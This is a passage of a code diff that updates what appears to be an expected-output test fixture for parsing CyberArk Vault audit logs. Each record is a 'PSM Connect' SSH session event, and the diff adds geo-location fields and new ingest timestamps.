"Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1300,7 +1444,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331193100Z", + "ingested": "2021-12-14T14:42:12.780171073Z", "original": "\u003c5\u003e1 2021-03-15T10:35:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:00\",\"IsoTimestamp\":\"2021-03-15T10:35:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1324,17 +1468,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1408,7 +1570,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331199Z", + "ingested": "2021-12-14T14:42:12.780171463Z", "original": "\u003c5\u003e1 2021-03-15T13:18:31Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:31\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:31Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:31\",\"IsoTimestamp\":\"2021-03-15T13:18:31Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1432,17 +1594,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1516,7 +1696,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331203Z", + "ingested": "2021-12-14T14:42:12.780171857Z", "original": "\u003c5\u003e1 2021-03-15T14:08:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:06\",\"IsoTimestamp\":\"2021-03-15T14:08:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -1540,17 +1720,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1633,7 +1831,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331207100Z", + "ingested": "2021-12-14T14:42:12.780172307Z", "original": "\u003c5\u003e1 2021-03-15T14:08:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:08:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:08:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:08:28\",\"IsoTimestamp\":\"2021-03-15T14:08:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", @@ -1657,17 +1855,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1750,7 +1966,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331210700Z", + "ingested": "2021-12-14T14:42:12.780172690Z", "original": "\u003c5\u003e1 2021-03-15T14:11:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814025\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:11:09\",\"IsoTimestamp\":\"2021-03-15T14:11:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814025\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "300", "kind": "event", @@ -1774,17 +1990,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -1867,7 +2101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331215300Z", + "ingested": "2021-12-14T14:42:12.780173185Z", "original": "\u003c5\u003e1 2021-03-16T10:04:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 16 03:04:51\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-16T10:04:51Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n 